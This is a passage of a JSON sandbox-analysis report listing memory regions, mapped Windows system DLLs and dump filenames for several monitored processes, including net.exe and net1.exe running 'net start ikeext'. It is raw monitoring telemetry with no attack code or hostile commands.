"region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1288", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1289", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1290", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.667", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001291-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_267", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1291", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:48.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2977791, "entry_point": 2555904, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1292", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:00:48.667", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001293-addr_0x00000000003a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_268", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:48.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1294", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:48.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1295", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1296", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1297", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1298", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:48.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1299", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:48.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1300", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:48.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1301", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:48.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1302", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4685823, "entry_point": 0, "filename": null, "id": "region_1303", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:00:48.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1304", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:48.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1305", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:48.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 0, "filename": null, "id": "region_1306", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:48.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_1307", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:00:48.679", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001308-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:48.680", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000018-region_00001309-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:00:48.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 5771263, "entry_point": 0, "filename": null, "id": "region_1310", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:00:48.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 18415615, "entry_point": 0, "filename": null, "id": "region_1311", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:00:48.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 18415616, "type": "region", "version": 1 }, "end_va": 19869695, "entry_point": 0, "filename": null, "id": "region_1312", "name": "pagefile_0x0000000001190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18415616, "timestamp": "00:00:48.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 22867967, "entry_point": 19922944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1313", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19922944, "timestamp": "00:00:48.700", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "net start ikeext", "filename": "c:\\windows\\system32\\net.exe", "id": "proc_19", "image_name": "net.exe", "monitor_reason": "child_process", "monitored_id": 19, "origin_monitor_id": 18, "ref_parent_process": { "ref_id": "proc_18", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000019-region_00001314-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1314", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:48.755", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000019-region_00001315-addr_0x0000000000030000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 720895, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:48.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 737279, "entry_point": 0, "filename": null, "id": "region_1316", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:00:48.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1317", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:48.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 13762560, "type": "region", "version": 1 }, "end_va": 13860863, "entry_point": 13781253, "filename": "\\Windows\\System32\\net.exe", "id": "region_1318", "name": "net.exe", "norm_filename": "c:\\windows\\system32\\net.exe", "region_type": "memory_mapped_file", "start_va": 13762560, "timestamp": "00:00:48.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1319", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:48.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1320", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:48.757", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1321", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:48.760", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000019-region_00001322-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_1322", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:48.760", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000019-region_00001323-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1323", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:48.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1324", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1325", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1326", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:00:48.775", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000019-region_00001327-addr_0x0000000000180000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:48.776", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000019-region_00001328-addr_0x0000000000320000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:48.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1829634048, "type": "region", "version": 1 }, "end_va": 1829687295, "entry_point": 1829638864, "filename": "\\Windows\\System32\\browcli.dll", "id": "region_1329", "name": "browcli.dll", "norm_filename": "c:\\windows\\system32\\browcli.dll", "region_type": "memory_mapped_file", "start_va": 1829634048, "timestamp": "00:00:48.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1910308864, "type": "region", "version": 1 }, "end_va": 1910382591, "entry_point": 1910313472, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_1330", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1910308864, "timestamp": "00:00:48.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934553087, "entry_point": 1934496350, "filename": "\\Windows\\System32\\samcli.dll", "id": "region_1331", "name": "samcli.dll", "norm_filename": "c:\\windows\\system32\\samcli.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:48.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1944518656, "type": "region", "version": 1 }, "end_va": 1944580095, "entry_point": 1944523425, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_1332", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1944518656, "timestamp": "00:00:48.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944584192, "type": "region", "version": 1 }, "end_va": 1944621055, "entry_point": 1944589734, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_1333", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944584192, "timestamp": "00:00:48.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947103231, "entry_point": 1947079309, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1334", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:00:48.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947254783, "entry_point": 1947182129, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1335", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:00:48.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1336", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:48.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1337", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1338", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:48.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1339", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:48.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1340", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:48.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1341", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1342", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1343", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:48.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1344", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.784", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\net1 start ikeext", "filename": "c:\\windows\\system32\\net1.exe", "id": "proc_20", "image_name": "net1.exe", "monitor_reason": "child_process", "monitored_id": 20, "origin_monitor_id": 19, 